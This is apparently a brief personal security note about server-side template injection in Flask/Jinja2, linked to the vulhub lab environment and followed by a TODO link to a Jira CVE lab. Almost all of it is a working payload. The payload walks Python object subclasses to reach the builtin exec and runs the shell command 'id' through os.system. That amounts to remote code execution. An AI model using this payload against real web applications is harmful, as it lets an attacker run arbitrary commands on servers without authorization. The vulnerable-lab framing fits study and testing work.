SSTI
https://github.com/vulhub/vulhub/tree/master/flask/ssti
GlobalsAttrCount=0
for a in ().__class__.__base__.__subclasses__():
if hasattr(a.__init__,'__globals__'):
break
GlobalsAttrCount += 1
().__class__.__base__.__subclasses__()[GlobalsAttrCount].__init__.__globals__['__builtins__']['exec']("__import__('os').system('id')")
TODO:https://github.com/vulhub/vulhub/tree/master/jira/CVE-2019-11581
参考
浙公网安备 33010602011771号